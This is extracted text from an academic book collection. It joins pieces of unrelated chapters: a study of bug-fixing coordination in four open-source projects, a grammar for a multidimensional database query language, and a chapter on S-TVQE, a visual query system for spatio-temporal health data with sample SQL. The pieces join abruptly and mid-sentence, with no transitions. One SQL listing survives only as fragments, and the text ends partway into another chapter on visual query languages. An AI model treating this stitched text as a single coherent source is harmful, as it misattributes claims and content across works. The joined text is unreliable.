    3.2.1 Verify bug already fixed (AF)
    3.2.2 Verify bug irreproducibility (NR)
    3.2.3 Verify need for a not yet supported function (NS)
    3.2.4 Verify identified bug as intentionally introduced (NCP)
  3.3.0 Ask for more details
    3.3.1 Ask for code version/command line (V)
    3.3.2 Ask for code back trace/examples (RBT/E)
  3.4.0 Identify bug causes (G)
    3.4.1 Identify and explain error (EE)
    3.4.2 Identify and explain bug causes different from code (PNC)
4.0.0 Fix (F)
  4.1.0 Propose temporary solutions (AC)
  4.2.0 Provide problem solution (SP)
  4.3.0 Provide debugging code (F)
5.0.0 Test & Post (TP)
  5.1.0 Test/approve bug solution
    5.1.1 Verify application correctness (W)
  5.2.0 Post patches (PP)
  5.3.0 Identify further problems with proposed patch (FNW)
6.0.0 Close
  6.1.0 Close fixed bug/problem
  6.2.0 Close not-fixed bug/problem
    6.2.1 Close irreproducible bug (CNR)
    6.2.2 Close bug that asks for a not yet supported function (CNS)
    6.2.3 Close bug identified as intentionally introduced (CNCP)
started by developing a coding scheme based on prior work on bug fixing (Crowston, 1997), which provided a template of expected activities needed for task assignment (those listed above). The coding system was then evolved through examination of the applicability of codes to particular examples. For example the message: I’ve been getting this same error every FIRST time I load the dynapi in NS (win32). After reloading, it will work… loading/init problem? represents a report submitted by another user (someone other than the person who initially identified and submitted the bug). This message was coded as “report similar problems”. Table 2 shows the list of task types that were developed for the coding. The lowest level elementary task types were successively grouped into 6 main types of tasks, namely Submit, Assign, Analyze, Fix, Test & Post, and Close. A complete example of the coded version of a bug report (the one from Figure 1) is shown in Figure 2.
Once we had identified the process tasks, we studied in depth the bug-fixing process as carried out in the four cases. Specifically, we compared the sequence of tasks across different bugs to assess which sequences were most common and the role of coordination mechanisms in these sequences. We also examined which actors performed which tasks as well as looked for ways to more succinctly present the pattern of tasks, for example, by presenting them as Markov processes. Because of the shortness and relative simplicity of our task sequences, we could exactly match task sequences, rather than having to statistically assess the closeness of matches to be able to form clusters (Sabherwal & Robey, 1995). Therefore, we were able to analyze the sequences by simple tabulation and counting, though more sophisticated techniques would be useful for larger scale data analysis. In the next Section we present the results of our analysis.
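As an illustration of this tabulation step, the following minimal sketch counts the transitions between consecutive coded tasks and the exact matches of whole sequences (the sample sequences are invented; the real input would be the coded bug reports described above):

```python
from collections import Counter, defaultdict

# each coded bug report is a sequence of the six main task types
sequences = [
    ["S", "An", "F", "TP", "C"],   # invented examples for illustration only
    ["S", "An", "C"],
    ["S", "F", "C"],
]

# count transitions from the task at position i-1 to the task at position i
transitions = defaultdict(Counter)
for seq in sequences:
    for previous, current in zip(seq, seq[1:]):
        transitions[previous][current] += 1

# relative frequencies of each transition, comparable to the entries of Table 5
for previous, counts in transitions.items():
    total = sum(counts.values())
    print(previous, "->", {task: round(n / total, 2) for task, n in counts.items()})

# exact matching of whole sequences, used to find the most common paths
most_common_paths = Counter(tuple(seq) for seq in sequences).most_common()
```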
Figure 2. Coded version of bug report in Figure 1

Bug ID: 0000000 — Summary: crash with alfa gills chat — Assigned to: mary — Submitter: kkhub

Task | Person | Comments
(S) | kkhub |
(V) | cenis | asks what version kkhub is running
(R) | cobvnl | reports the same problem as kkhub; submits information about the operating systems and the libraries
(V) | cenis | asks again what version both users are running
(W) | kkhub | reports the most recent version of cicq works
(TP&C) | cobvnl | reports version information and closes the bug
(C) | | bug closed
FINDINGS
In this section we present the findings from our analysis of the bug-fixing process in the four projects and the coordination mechanisms employed. Data about the percentage of submitted, assigned and fixed bugs both by team members and individuals external to the team for each project are reported in Table 3. Table 4 summarizes our findings regarding the nature of the bug-fixing process in the four projects. We now present our overall analysis of the bug-fixing process. Each instance of a bug-fixing process starts (by definition) with a bug submission
Table 3. The bug-fixing process: Main results

 | Kicq | DynAPI | Gaim | phpMyAdmin
Bugs submitted by team members | 9.7% | 21% | 0% | 21.6%
Bugs submitted by members external to the team | 90.3% | 78.9% | 100% | 78.4%
Bugs assigned/self-assigned, of which: | 9.7% | 0% | 1% | 2%
  assigned to team members | 0% | - | 100% | 100%
  self-assigned | 66% | - | 0% |
  assigned to members external to the team | 33% | - | 0% |
Bugs fixed | 51.6% | 42.1% | 80% | 51%
  fixed by team members | 81.3% | 50% | 90.2% | 84%
  fixed by members external to the team | 18.7% | 50% | 9.8% | 16%
Table 4. Observed characteristics of the bug-fixing processes in the four projects

 | Kicq | DynAPI | Gaim | phpMyAdmin
Min task sequence | 3 | 2 | 2 | 2
Max task sequence | 8 | 12 | 9 | 13
Uncommon tasks (count) | Bug assignment (3) | Bug assignment (0) | Bug assignment (0) | Bug assignment (1)
Community members | 18 | 53 | 23 | 20
Team members' participation | 2 of 9 | 6 of 11 | 3 of 9 | 4 of 10
Most active team members (role: name) | Project mgr: denis; Developer: davidvh | Admin: rainwater; Ext member: dcpascal | Admin-developer: warmenhoven; Developer: robflynn | Admin-developer: loic1; Admin-developer: lem9
Max posting by a single community member | 2 | 6 | 4 | 3
Not fixable bugs closed | 8 | 5 | 5 | -
(S) and finishes with bug closing (C). Submitters may submit problems/symptoms associated with bugs (Ss), incompatibility problems (NC) and/or provide information about the code back trace (BT). After submission, the team’s project managers or administrators may assign the bug to someone to be fixed ((A); (A*) if they self-assign the bug). Other members of the community may report similar problems they encountered (R), discuss bug causes (T), identify bug causes (G) and/or verify the impossibility of fixing the bug. Participants often ask for more information to better understand the bug’s causes (An). In most cases, but not always, after some discussion, a team member spontaneously decides to fix (F) the bug. Bug fixing may be followed by a test and the submission of a patch (TP). Testing is a coordination mechanism that manages the usability dependency between producing and using a patch, by ensuring that the patch is usable. However, as later explained, in the examined projects this type of activity is not often found. The bug is then closed (C). Bugs may also be closed because they cannot be fixed, for example, if they are not reproducible (CNR), involve functions not supported yet (CNS) and/or are intentionally introduced to add new functionality in the future (CNCP). Notice that the closing activity is usually attributed to a particular user. For our analysis, we consider Submission, Analysis, Fix and Close to be operative activities, while Assignment, Test and Posting are coordination mechanisms. As already discussed, Assignment is the coordination mechanism used to manage the dependency between a task and the actor appropriate to perform it. Posting is the mechanism used to manage the dependency between a task and its customers (it makes the fix available to the people who need it). The tasks identified above are linked by sequential dependencies as shown in Figure 3. These dependencies were identified by considering the logical connection between tasks based on the flow of resources. For example, a patch cannot be tested before it is created. Because the dependencies can be satisfied in different orders, different sequences of the activities are possible. The tasks and their sequence change from bug to bug. Figure 3 shows the most frequent sequences observed, as identified by tabulating and counting the sequences. Table 5 shows the portion of processes that follow each possible path, based on the ways the bug-fixing process was observed to be
Figure 3. Task dependencies in the bug-fixing process (the tasks are: 1 submit, 2 assign, 3 analyze, 4 fix, 5 test & post, 6 close)
Table 5. Portion of processes for each possible path (for each project, the frequency with which each task type S, As, An, F, TP or C occurs as task i given the preceding task i-1, for i = 2, 3, 4)
Table 6. Task occurrences and average number of tasks per project

Project (bugs) | (S) | (Ag) | (An) | (F) | (TP) | (C) | Avg. tasks per bug
KICQ (31) | 44 | 4 | 24 | 23 | 0 | 31 | 4.4
Dynapi (95) | 121 | 0 | 94 | 54 | 9 | 95 | 3.8
Gaim (51) | 71 | 1 | 77 | 28 | 4 | 51 | 4.2
Phpmyadmin (51) | 54 | 2 | 66 | 45 | 15 | 51 | 4.6
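One way to check whether the distribution of task types differs across the four projects is a χ2 test of independence on the counts in Table 6; a minimal sketch, assuming Python with SciPy is available:

```python
from scipy.stats import chi2_contingency

# task occurrences per project from Table 6 (columns S, Ag, An, F, TP, C)
observed = [
    [44, 4, 24, 23, 0, 31],    # KICQ
    [121, 0, 94, 54, 9, 95],   # Dynapi
    [71, 1, 77, 28, 4, 51],    # Gaim
    [54, 2, 66, 45, 15, 51],   # phpMyAdmin
]

chi2, p_value, dof, expected = chi2_contingency(observed)
print(f"chi2 = {chi2:.1f}, dof = {dof}, p = {p_value:.4g}")
```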
performed within the FLOSS teams. For example, row 1 of Table 5 is read as follows. In the Dynapi project, submission always occurs as the first task (as it does for all of the groups, by definition), while the second task is S in 26% of cases, An in 39% of cases, F in 19% of cases, TP in 1% of cases and C in 15% of cases, and so on. In Table 6, we describe the occurrences per task for the four projects and the average number of tasks to fix bugs. A χ2 test shows a significant difference in the distribution of task types across projects.

create fact <fact_name> ( <measure 1> [<aggregate_function>], <measure 2> [<aggregate_function>], ... )
  [ connect to <dimension_name 1>, <dimension_name 2>, ... ];
create dimension <dimension_name> ( <attribute 1> [...], <attribute 2> [...], ... )
  [ as ( ... ) ]
  [ with hierarchy <hierarchy_name 1> ( level <level 1> [(<weak_attribute1_1>, <weak_attribute1_2>, ...)],
                                        level <level 2> [(<weak_attribute2_1>, <weak_attribute2_2>, ...)], ... ),
    with hierarchy <hierarchy_name 2> ... ];

Drop orders
drop dimension <dimension_name>;
drop fact <fact_name> [cascade];

DML
The Data Manipulation Language consists of inserting, deleting, updating, or querying multidimensional databases.

Update orders
update dimension <dimension_name> set <attribute> = <value> [, set <attribute> = <value>, ...] [ where <predicate> ];
update dimension <dimension_name> set (<attribute 1>, <attribute 2>, ...) = ( ... ) [ where <predicate> ];

Delete orders
delete from dimension <dimension_name> where <predicate>;
delete from fact <fact_name> where <predicate>;

Select order
select <aggregate_function>(<measure 1>), <aggregate_function>(<measure 2>), ...
  [ according to [ rows <level 1>, <level 2>, ..., of <dimension_name_row> with <restriction>, ]
                 [ columns <level 1>, <level 2>, ..., of <dimension_name_col> with <restriction> ] ]
  from <fact_name>
  [ where <predicate> ]
  [ order by values(<attribute 1>, <attribute 2>, ...) [ ... [, values(<attribute 1>, <attribute 2>, ...)], ... ] ];
This work was previously published in Database Modeling for Industrial Data Management: Emerging Technologies and Applications, edited by Z. Ma, pp. 323-360, copyright 2006 by Information Science Publishing (an imprint of IGI Global).
Chapter 3.8
Toward a Visual Query System for Spatio-Temporal Databases Valéria M. B. Cavalcanti Federal University of Campina Grande, Brazil Ulrich Schiel Federal University of Campina Grande, Brazil Claudio de Souza Baptista Federal University of Campina Grande, Brazil
ABSTRACT Visual query systems (VQS) for spatio-temporal databases, which enable the formulation of queries involving both spatial and temporal dimensions, are an important research subject. Existing results treat these dimensions separately, and there are only a few integrated proposals. This chapter presents a VQS called spatio-temporal visual query environment (S-TVQE), which allows the formulation of conventional, spatial, temporal, and spatio-temporal database queries in an integrated environment. With S-TVQE, the user, instead of querying the database through textual query languages, interacts with the system through visual operators to state the query conditions. The tool provides a visualization of
the results in different formats such as maps, graphics, and tables.
INTRODUCTION The growing significance of geographic information systems and other spatio-temporal information systems is unquestionable (Sellis, Frank, Grumbach, Guting, & Koubarakis, 2003). Decision-makers need to analyze data through thematic maps, timelines, search critical regions, and so on. Therefore, it is mandatory to provide user-friendly tools, specially designed for these decision-makers so that they can express their needs adequately and explore the full potential of the underlying information systems. The visual specification of
database queries enables an abstraction of the database schema and textual query languages, which makes user interaction easier. A visual interface represents an additional layer (Shneiderman, 1998), which mediates between the user and a textual query language such as, for instance, structured query language (SQL) (Silberschatz, Korth, & Sudarshan, 2005) in order to access a database. For instance, spatial constraints from the visual query are converted to SQL statements, which are executed on the underlying database management system (DBMS). That task must be executed in a transparent way; in other words, no knowledge of the database schema or language syntax is required (Snodgrass, 1999), which facilitates the usability of the database, mainly for sporadic users who are not familiar with technical details of the database. The use of visual query interfaces is more significant for spatio-temporal databases than for conventional databases for two reasons: (1) spatial data are inherently visual and (2) textual query languages for those enhanced applications are more complicated since they must provide syntax to express temporal and spatial restrictions. For textual database query languages such as SQL (Silberschatz, Korth & Sudarshan, 2005), there are extensions to access temporal data such as TSQL2 (Snodgrass 1995), and spatial data
such as spatial-SQL (Egenhofer, 1994). These extensions are adequate for experienced database programmers and automatic data extraction tools. Many end users have no expertise on computer systems. For this group, visual query systems has proven to be the most adequate interface (Catarci et al., 1997). This chapter presents a generic visual environment for the access to spatio-temporal database systems especially geographic information systems. The environment can be plugged into existing databases. For the validation of the system, we used real data from geo-referenced health information of the Brazilian Health System (SUS). SUS is an institution responsible for collecting, processing, and disseminating health information of Brazilian government. Information related to health is generated daily in the whole country, and is stored considering valid time and spatial parameters. The volume of information already existent is very large and increases every day. Seeking to improve the quality of investments of health resources, the administrators perform statistical analyses with this data. The health information system divides the country into regions, states, regional health nucleus (NRS), and municipal districts. Data about
Figure 1. Class schema of the health information system: the classes HOSPITAL (S) (id, name), DISTRICT (S) (ibge-code, ibge-name, population (T)), PATIENT (T) (code, aih-present (T), aih-paid (T)) and SPECIALITY (name), with the associations located-in (HOSPITAL 0..* to 1 DISTRICT), attends (HOSPITAL to PATIENT) and a bed-speciality link between HOSPITAL and SPECIALITY
hospitals, admissions, attendances, and so on are stored in the database. A simplified conceptual schema using UML notation for this system is shown in Figure 1. Note the following conventions: objects may be conventional, spatial, temporal, or combinations of them. These characteristics are stated at class level attached to the class name. For instance, HOSPITAL (S) is spatial and PATIENT (T) is temporal. This means that each instance of HOSPITAL has an implicit geometry and each PATIENT has implicit valid-time attributes. Attributes may be either conventional or temporal. For instance, DISTRICT.population (T) is a temporal attribute. Note that in the class PATIENT we have the history of the patients and, for each patient, we have the history of their registration cards (aih), when they were admitted (aih-present) and when they were paid (aih-paid). The remainder of this chapter is organized as follows. The next section addresses related work on visual query systems. After that, we review the limitations of current systems and present the S-TVQE environment. What is missing in order to get a completely satisfactory solution is discussed next, and the last section concludes the work.
RESEARCH BACKGROUND ON VISUAL QUERY SYSTEMS A great effort in research has been spent to develop more user-friendly interaction paradigms, especially considering some kind of visual interaction, for both conventional and advanced databases (Bonhomme, Trépied, Aufaure, & Laurini, 1999; Morris, Abdelmoty, Tudhope, & El-Geresy, 2002; Shimabukuro, Branco, Oliveira, & Flores, 2003). According to the visual formalism adopted in the query, visual query systems may be classified into: •
Table: Data is organized and visualized as tables. Preview of table extension and intension may be available (e.g., QBE).
•
• •
Diagrammatic: By using a graph it is possible to visualize both schema and instances. Iconic: Uses icons to represent data. Hybrid: Combines the previous visual representations in a unique interface.
For accessing spatio-temporal databases, the most of new visual interfaces have been developed either for spatial data such as ArcGis (2006), CIGALES (Calcinelli & Mainguenaud, 1994), Geomedia (2006), spatial query by sketch (Egenhofer, 1997), geovisual (Soares, 2002) or for temporal data as TVQE (Silva, Schiel, & Catarci 2002), and TVM-Web (Silveira, Edelweiss, & Galante, 2004). Geomedia and ArcGis are commercial GIS, which provide visual interaction with limited support for temporal and spatio-temporal dimensions. CIGALES (cartographical interface generating and adapted language for extensible systems) (Calcinelli & Mainguenaud, 1994) supports visual queries to a geographical database. The user combines lines and areas with some spatial operators to build the query. Spatial query by sketch (Egenhofer, 1997) enables the definition of spatial queries through sketch, which represents the spatial relations between the schema elements. Apart from the spatial relation, other relations may be used. Ambiguities are solved through user interaction. Morris et al. (2002) have developed a visual query environment for large spatial databases using a diagrammatic approach based on a data flow metaphor. They propose icons for the different spatial relations and use a hierarchy for the different granularities of these relations. TVQE (temporal visual query environment) (Silva, Schiel & Catarci, 2002) is a visual query system for temporal databases. It is a hybrid system as it uses diagrammatic and iconic representations. It is based on the temporal graph model (TGM) (Silva, Schiel & Catarci, 2002), which specifies a conceptual database schema as a directed graph
in which edges represent classes, relationships, and attributes, being temporal or not. TVM Web (Silveira, Edelweiss & Galante, 2004), like TVQE, is a visual query system on the Web for temporal data. It aims to supply the user with a friendly and easy learning interface that explores the temporal and versioned information stored in a TVM database. Visual interfaces for spatio-temporal databases are query-by-trace (Erwig & Schneider, 2000) and the visual interactive query interface (Li & Chang, 2004). Query-by-trace (QBT) is a system that enables the definition of spatiotemporal queries through primitive graphics based on lines and areas that represent the space operations. The user inserts objects freely (line or area) in an area for definition of the moving trace of the object. Several such traces determine the spatial relations between the objects in the query. QBT realizes the mapping into primitive space operators for subsequent optimization. To represent the moving of objects through time they use a two-dimensional area, one axis representing the space and the other time. This system is specifically designed for describing and querying moving objects. The visual interactive query interface (Li & Chang, 2004) proposes a visual query system based on an extension of SQL for spatio-temporal databases, called ΣQL. The system has been applied to movie databases and there is no evidence that it works properly on geographic information systems. Lvis (Bonhomme et al., 1999) is a visual query language extended from the CIGALES project (Calcinelli & Mainguenaud, 1994), which provides support for conventional, spatial, temporal, and spatio-temporal queries, using the query-by-example metaphor. It uses topological and metric spatial relations and there is no evidence that the query results are spatial, temporal, or graphic.
THE SPATIO-TEMPORAL VISUAL QUERY ENVIRONMENT As has been seen in the previous section, there are many approaches supporting the expression of visual queries for spatial database or for temporal databases. Integrated proposals for spatio-temporal databases concentrate on moving objects. One of the most significant data in geographic information systems are temporally bounded maps. Therefore, in order to state queries adequately to their data structures, visual query systems integrating spatial and temporal constraints are mandatory. In this context, we present a spatio-temporal visual query environment called S-TVQE which achieves this integration. S-TVQE is an extension of the temporal visual query environment (TVQE) (Silva, Schiel, & Catarci, 2002), which adds to conventional and temporal visual query operations, support for stating spatial and spatio-temporal queries. In this section, we address important issues on designing visual query system with spatio-temporal capabilities. Firstly, a methodology for the interface design is addressed, followed by the importance of providing a configurable interface. Then architectural issues are highlighted. Hence, we focus on the important aspects for non-spatial, spatial, temporal, and spatiotemporal visual query systems (VQS).
Interface Design Issues There are many methodologies for designing a user-friendly interface (Hackos, 1998; Shneiderman, 1998). A task-oriented methodology such as ICM (interface conception method) (Scherer, 2003) is very appropriate for the development of visual query systems. This methodology is interactive, task oriented, and user-centered. ICM contains seven steps:
1. Requirements analysis and specification: Provides the requirement analysis for S-TVQE.
2. Task modeling: Determines the necessary actions to execute system tasks.
3. Interaction modeling: Associates task objects with interaction ones based on the task model, giving an interaction model.
4. Visual modeling: Defines the objects presentation based on ergonomic issues, user profile, and task features.
5. The establishment of navigation and help procedures: Identifies and organizes the interface transition situations.
6. Prototype construction: Generates an interface prototype code, based on the previous artifacts.
7. Prototype evaluation: Interface validation through usability tests.
Flexible Configuration through XML XML has been largely used for providing flexibility in system configuration. This flexibility avoids code recompilation, as only a new deployment is necessary. Therefore, we have followed this approach in the design of S-TVQE, which enables it to work in different contexts: it is only necessary to configure an XML file that determines the primitive operations and the schema of the database. In order to define the current database, which determines the context to be configured in S-TVQE, an XML file is edited. This file represents a view of the underlying schema, which describes the tables, keys, and attributes. For spatial objects there is an element called level with an id attribute, which indicates the “contains” spatial relationship, so that level i+1 is spatially contained in level i. Each level element contains sub-elements which indicate the geometric field, the table key, and attribute features such as column name, column type, table, and whether the attribute is conventional, spatial, or temporal. Finally, an element called grouped describes an optional aggregation function to be used. An example of such an XML configuration describes the levels “State” and “District” of the health information system: the State level maps to the table statemap with geometry field geom_id, and the District level maps to the table districtmap with geometry field geomid.
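The exact markup of the configuration file is not reproduced here; the following sketch shows one hypothetical form such a file could take and how it might be read (only the level element, its id attribute and the grouped element are named in the description above; every other element and attribute name is an assumption made for illustration):

```python
import xml.etree.ElementTree as ET

# hypothetical configuration: apart from <level>, its id attribute and <grouped>,
# the element and attribute names below are illustrative assumptions
CONFIG = """
<schema>
  <level id="1" name="State" table="statemap" geometry="geom_id" key="state_id">
    <attribute column="name" type="conventional"/>
  </level>
  <level id="2" name="District" table="districtmap" geometry="geomid" key="district_id">
    <attribute column="population" type="temporal"/>
  </level>
  <grouped function="sum"/>
</schema>
"""

root = ET.fromstring(CONFIG)
# level i+1 is spatially contained in level i
for level in sorted(root.findall("level"), key=lambda lv: int(lv.get("id"))):
    print(level.get("id"), level.get("name"), level.get("table"), level.get("geometry"))
```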
Architectural Issues S-TVQE was developed to serve as a generic interface for spatio-temporal databases and could be connected easily to any relational database system with spatial capabilities such as PostgreSQL, Oracle, DB2, or MySQL. Nonetheless, there are many proposals of temporal query languages, of which TSQL2 (Snodgrass, 1995) is the most representative. None of them has been incorporated into the SQL standard. Moreover, there is no SQL-like language combining spatial and temporal capabilities. Furthermore, there is no widely used temporal database management system. For this reason we considered that the underlying DBMS is relational with spatial capabilities. The valid-time temporal information is stored as explicit time attributes (from, to). In this environment, the temporal primitives must be converted to relational predicates concerning the attributes from and to. We have adapted the mapping of
temporal queries of TVQE developed by Santos (2000), considering also spatial queries. The S-TVQE architecture is distributed into three tiers as can be seen in Figure 2. S-TVQE is available on the Web through a browser and therefore can be used in different platforms. After an interactive query statement has been produced, the interface (presentation layer) sends the query operators stored in an XML file to the query manager through an http protocol using JSP technology. These primitive graphical operations are converted into SQL commands running on the database via JDBC. The visual results are rendered using Java, XML, and SVG technologies.
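For instance, a visual temporal restriction such as “during the year of 2002” has to be rewritten as a predicate over the two explicit time attributes; the sketch below illustrates the idea (the table and column names are assumptions, not the actual S-TVQE mapping rules):

```python
def during_period(table: str, start: str, end: str) -> str:
    """WHERE fragment: the row's valid time lies entirely within [start, end].

    Assumes the valid time is stored in columns valid_from and valid_to,
    standing in for the from/to attributes mentioned in the text.
    """
    return (f"{table}.valid_from >= DATE '{start}' "
            f"AND {table}.valid_to <= DATE '{end}'")

def overlaps_period(table: str, start: str, end: str) -> str:
    """WHERE fragment: the row's valid time overlaps the period [start, end]."""
    return (f"{table}.valid_from <= DATE '{end}' "
            f"AND {table}.valid_to >= DATE '{start}'")

# e.g., the restriction "during the year of 2002" on admissions data
print(during_period("aih", "2002-01-01", "2002-12-31"))
```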
Query Interaction

In order to pose a query, users may follow several steps. The following algorithm presents the whole interaction process.

Figure 2. The S-TVQE architecture

• Definition of the geographic area of interest: "Visual Selection";
• Choice of the attributes which will take part in the query: "Searching Attributes";
• Optionally, definition of restrictions on the chosen attributes: "Query Item Edition";
• Choice of the operator (spatial, temporal, or relational) according to the dimension of the attribute: "Operators";
• Filling of the necessary fields: "Query Item Edition";
• Addition of the attribute to the query: "Current Query";
• Query results.
In the following, we explain each of these steps in detail. As an example to illustrate the steps, we use the query "show the neighbor districts of Campina Grande in the III NRS of the state of Paraíba, Brazil, which have an ambulatory (outpatient) service and a number of admissions (aih) less than 50 during the year 2002."
Figure 3. Map navigation to define the region of interest—Brazil -> Northeast Brazil -> Paraiba State -> Campina Grande district
Figure 4. Attributes from the III NRS region
Figure 5. Example of a conventional attribute chosen
Figure 6. Example of a current query
Step 1: The definition of the geographic area of interest is done through "Visual Selection." The user visually chooses the region of interest by navigating in the map (Figure 3). It is also possible to enter the region of interest by name.
Step 2: Choice of the attributes which will take part in the query: "Searching Attributes." Once the region of interest has been fixed, the attributes from the chosen geographical area are displayed. They may be conventional (non-spatial), spatial, or temporal, each denoted by a distinct icon, as shown in Figure 4.
Step 2.1: Definition of optional query restrictions on the chosen attributes: "Query Item Edition." After choosing an attribute, its possible operators (conventional, spatial, or temporal) are displayed and the user may specify the query restriction, as shown in Figure 5.
Step 3: Addition of the attribute to the query: "Current Query," which will hold the chosen geographical area, the attributes, the specific operator (conventional, spatial, or temporal), and the restriction, as shown in Figure 6.
Step 4: Query Results: According to the dimension of the attributes chosen for the query,
there are different types of results as shown in Table 1. Spatio-temporal queries can use combinations of the previous formats. For instance, the result
Table 1. Possible ways of exhibition in the projection of the results

Supported dimension | Description                                                                                   | Projection
Temporal            | Attributes with historical significance, in other words, associated to a valid time interval. | Table or Graphic
Spatial             | Attributes related to a geographical location.                                                | Table or Map
Conventional        | Attributes without temporal or spatial reference.                                             | Table
Figure 7. Spatial query result
Figure 8. Temporal query result
of a spatio-temporal query can show a sequence of maps, each one associated to a specific time. Figure 7 shows the map for February 2002 and Figure 8 displays a complete time-graph.
Query Translation S-TVQE enables the definition of conventional, spatial, temporal, and spatio-temporal queries. The query translator is responsible for generating the SQL code of the visual query according to the underlying DBMS syntax.
Conventional Queries

Conventional queries are those that use neither spatial nor temporal dimensions. The operators allowed are the relational ones. An example of such a query would be: Retrieve the city names of the III NRS region, the population of which is greater than 10,000 inhabitants and the net clinic of which is above 3. Figure 9 shows the chosen attributes for this query. Table 2 shows the relational operators for conventional queries and their equivalent SQL mapping. The previous query is then translated into SQL as:

SELECT   district.ibge_name, ..., nrs.ibge_name
FROM     district, population, net_clinic, nrs
WHERE    nrs.gid = district.nrs
         and upper(nrs.ibge_name) = upper('III NRS')
         and population.qty > 10000
         and district.gid = population.district
         and net_clinic.clinic > 0
         and district.gid = net_clinic.district
         and population.until ISNULL
         and net_clinic.until ISNULL
GROUP BY district.ibge_name, nrs.ibge_name
Figure 9. Attributes and their restrictions
Table 2. Relational operators mapping

Operator              | SQL Mapping (Conventional)
Equal                 | SELECT ... FROM ... WHERE table.attribute = value
Less Than             | SELECT ... FROM ... WHERE table.attribute < value
Less or Equal Than    | SELECT ... FROM ... WHERE table.attribute <= value
Greater or Equal Than | SELECT ... FROM ... WHERE table.attribute >= value
Spatial Queries

Spatial queries require at least one geometry to deal with a spatial operator. An example of such a query would be: Retrieve the cities adjacent to the city of Campina Grande, which are part of the III NRS region and the population of which is less than 10,000 inhabitants. Tables 3, 4, and 5 present the spatial operators and their mapping to SQL. The previous query is translated into SQL as:

SELECT   district.ibge_name, district.the_geom, sum(population.qtdy), nrs.ibge_name
FROM     district, population, nrs
WHERE    nrs.gid = district.nrs
         and upper(nrs.ibge_name) = upper('III NRS')
         and touches(district.the_geom,
             (select the_geom from district
              where upper(ibge_name) = upper('Campina Grande')))
         and population.qty < 10000
         and district.gid ...
Table 3. Mapping metric spatial operators into SQL

S-TVQE Operator | DBMS Operator
Area            | AREA(GEOM)
Perimeter       | PERIMETER(GEOM)
Distance        | DISTANCE(geom1, geom2)

Table 4. Mapping directional spatial operators into SQL

Table 5. Mapping topologic spatial operators into SQL

S-TVQE Operator | PostgreSQL + PostGIS Operator
Adjacency       | Touches(geom1, geom2)
Disjunction     | Not touches(geom1, geom2)
Covered By      | Contains(geom1, geom2), Within(geom1, geom2)
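As a hedged illustration of the operators in Tables 3 and 5, an adjacency test combined with the Area metric could be issued directly against a PostgreSQL/PostGIS database as sketched below. The unprefixed functions touches and area match the ones used in this chapter's listings; more recent PostGIS releases expose them as ST_Touches and ST_Area.

-- Sketch: districts adjacent to Campina Grande, with their areas.
SELECT   a.ibge_name,
         area(a.the_geom) AS district_area
FROM     district a, district b
WHERE    upper(b.ibge_name) = upper('Campina Grande')
  AND    touches(a.the_geom, b.the_geom);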
Temporal Queries

Temporal queries deal with historical data, which have specific operators. An example of such a query would be: "Retrieve the cities from the III NRS region which have a number of admissions (aih) less than 200 during the year 2002."
Tables 6, 7, and 8 present how temporal constraints are mapped into SQL clauses. The time of the query is given by the variable “p” and the valid-time of the objects in the database is “tv.”
Table 6. Mapping instant temporal operators into SQL

S-TVQE Operator | SQL Instant mapping
Begin           | SELECT ... FROM ... WHERE tv.begin = p
At              | SELECT ... FROM ... WHERE ...
End             | SELECT ... FROM ... WHERE tv.end = p

Table 7. Mapping interval temporal operators into SQL

S-TVQE Operator | SQL Interval selection
First Interval  | SELECT ... FROM ... WHERE p >= (SELECT MIN(table.begin) FROM table) AND ...
Last Interval   | SELECT ... FROM ... WHERE p >= (SELECT MAX(tv.begin) FROM table) AND ...

Table 8. Mapping period temporal operators into SQL

S-TVQE Operator | SQL Period mapping
Before          | SELECT ... FROM ... WHERE tv.end < p.begin
Start           | SELECT ... FROM ... WHERE tv.begin = p.begin AND tv.end < p.end
During          | SELECT ... FROM ... WHERE tv.begin > p.begin AND tv.end < p.end
Cross 1         | SELECT ... FROM ... WHERE p.begin > tv.begin AND tv.end > p.begin AND p.end > tv.end
Cross 2         | SELECT ... FROM ... WHERE tv.begin > p.begin AND p.end > tv.begin AND tv.end > p.end
Precedes        | SELECT ... FROM ... WHERE tv.end = p.begin
Finish          | SELECT ... FROM ... WHERE p.begin < tv.begin AND tv.end = p.end
After           | SELECT ... FROM ... WHERE tv.begin > p.end

In the SQL generated for the previous temporal query, these mappings appear as comparisons of the valid-time attributes of the admission data (such as admission.until) against the boundary dates of the year 2002, for example '2002-01-01'.
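Applying the During row of Table 8 to the example temporal query gives, roughly, the SQL below. This is a sketch only: the admission table and its columns (aih, district, "from", until) are assumptions pieced together from fragments quoted in this chapter, not the system's exact output.

-- Sketch: admissions (aih) below 200 for districts of the III NRS region,
-- valid during the year 2002 (During: tv.begin > p.begin and tv.end < p.end).
SELECT   d.ibge_name, sum(a.aih)
FROM     district d, nrs n, admission a
WHERE    n.gid = d.nrs
  AND    upper(n.ibge_name) = upper('III NRS')
  AND    a.district = d.gid
  AND    a.aih < 200
  AND    a."from" > DATE '2002-01-01'    -- tv.begin > p.begin
  AND    a.until  < DATE '2002-12-31'    -- tv.end   < p.end
GROUP BY d.ibge_name;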
defined as hybrid. In this type of language, tables and diagrams are often used to define the database schema and constraints, icons can represent specific prototypical objects and operations, and sketches can be useful to specify topological and geometrical constraints. This is particularly common when considering the implemented version of the languages; for example, even a purely tabular VQL like QBE has some diagrammatic features in the implemented version of the language provided by Microsoft Access. An interesting example of hybrid VQL is Kaleidoquery (Murray, Paton, & Goble, 1998). This is based on a filter flow model, representing the successive filtering stages operated by the query from the initial mass of information to the required output result. In this language, classes of objects in the database are represented by icons and diagrams are used to depict the flow and refinement of information through the query (see Figure 4).
DATA MODELS AND VQLS A data model is a combination of constructs used to organize data (Atzeni, Ceri, Paraboschi, & Torlone, 1999). This is strictly related to the concept of schema, as the adoption of a certain data model determines the way data are structured, and consequently the schema types present in the database. As previously noted, one of the key aspects in the formulation of a query is the specification of the input and output schemas. Since the schema types in a database are determined by the specific data model adopted, the model itself has a significant influence on the query language’s characteristics: data models with more sophisticated, modular constructs require a corresponding higher level of complexity in the query language constructs, regardless of whether they are textual or visual. On the other hand, some data model constructs, such as hierarchical relationships, have a more straightforward, intuitive representation in visual languages.
A fundamental step in specifying the query input schema is the display of the database’s available schema. A formal approach to this fundamental issue was proposed in Haber, Ioannidis, and Livny (1994) and is based on the concepts of visual schema and visual metaphor. The visual schema describes not only the information structure by visual primitives defined in the specific visual model, but also the way data schema information must be presented on the screen. The visual metaphor is simply a mapping between elements of the database and visual schema. In conventional graphical user interfaces, visual schemas are used both to present data schema information in visual form and to manipulate the data schema by modifying the elements of the visual schema.
The Impact of Model Abstraction

